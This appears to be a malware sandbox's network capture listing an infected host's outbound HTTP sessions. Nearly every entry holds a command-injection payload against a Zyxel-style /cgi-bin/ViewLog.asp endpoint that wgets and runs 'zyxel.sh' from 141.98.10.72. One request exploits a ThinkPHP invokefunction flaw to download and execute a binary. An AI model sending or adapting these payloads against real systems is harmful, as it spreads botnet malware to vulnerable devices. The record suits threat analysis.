Feb 14, 2024 09:29:19.422807932 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.15	36700	31.200.86.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.422863007 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.15	36972	95.216.204.254	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.480417967 CET	48	IN	HTTP/1.1 101 Switching Protocols

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.15	60332	88.220.84.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.501375914 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.732599020 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:32:20 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.15	60972	31.136.253.135	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.876840115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.506437063 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:21.754403114 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.250291109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:29.370171070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.354000092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:00.345343113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304266930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.15	55162	94.123.176.56	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.922508001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.15	43762	94.122.21.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.428968906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.15	46800	94.121.186.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.450865984 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.15	58270	95.239.32.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.461287022 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:21.724486113 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:21 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.15	46934	31.136.20.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.631867886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.266638994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.514333963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:26.046221972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.166269064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.145791054 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393284082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.352102041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.15	41780	31.136.84.70	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.649605036 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.330313921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.674362898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:26.554284096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.930097103 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:42.681832075 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.441211939 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.447905064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.15	57722	85.209.136.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.672522068 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
